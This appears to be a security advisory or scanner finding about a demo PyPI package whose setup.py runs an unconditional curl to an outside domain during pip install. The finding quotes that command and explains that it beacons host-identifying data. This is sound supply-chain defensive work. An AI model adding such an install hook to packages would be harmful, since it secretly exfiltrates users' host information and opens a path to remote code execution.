setup.py executes os.system("curl xiangyangt.com/pypi") unconditionally during pip install. This is an unauthenticated plaintext HTTP request to a personal third-party domain that is not associated with any documented publisher of this package. The request leaks the installer's IP address, User-Agent, and the fact that the package was installed on the host. The package is otherwise a trivial demo (placeholder author="demo", description "A demo pip package") with no functional need for any network activity at install time. While the response is not piped to a shell here, the install-time outbound beacon is a deliberate exfiltration of host-identifying data to an attacker-chosen endpoint, and the curl-pipe-to-shell variant is one edit away.